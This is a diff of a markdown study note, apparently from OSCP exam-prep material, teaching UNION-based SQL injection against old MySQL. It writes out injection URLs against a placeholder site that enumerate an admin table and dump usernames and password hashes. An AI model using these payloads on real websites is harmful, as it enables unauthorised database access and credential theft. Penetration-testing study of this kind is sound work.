M-1-7-7/Scripts/OSCP/websites/sql_injection.md

 # Getting tables and columns names :

-here we have a job to do!!
+**here we have a job to do!!
 if the MySQL Version is < 5 (i.e 4.1.33, 4.1.12...)

 1. lets see that the table admin exist!

-http://www.website.com/articles.php?id=3 union all select 1,2,3,4,5 from admin/*
+ a. `http://www.website.com/articles.php?id=3 union all select 1,2,3,4,5 from admin/*``

 2. and here we see the number 3 that we had in the screen now, we knows that the table admin exists

 3. here we had to check column names:

-http://www.website.com/articles.php?id=3 union all select 1,2,username,4,5 from admin/*
+	a. `http://www.website.com/articles.php?id=3 union all select 1,2,username,4,5 from admin/*

 4. if we get an error we have to try another column name, and if it work we get username displayed on screen (example: admin,moderator,super moderator...)

 5. after that we can check if column password exists, we have this

-http://www.website.com/articles.php?id=3 union all select 1,2,password,4,5 from admin/*
+	a. `http://www.website.com/articles.php?id=3 union all select 1,2,password,4,5 from admin/*`

 6. and oups! we see password on the screen in a hash or a text, now we have to use 0x3a for having the informations like that username:password ,dmin:unhash...

-http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*
+	a. `http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*

 7. this is the sample SQL Injection , now, we will go to the blind sql injection (more difficult)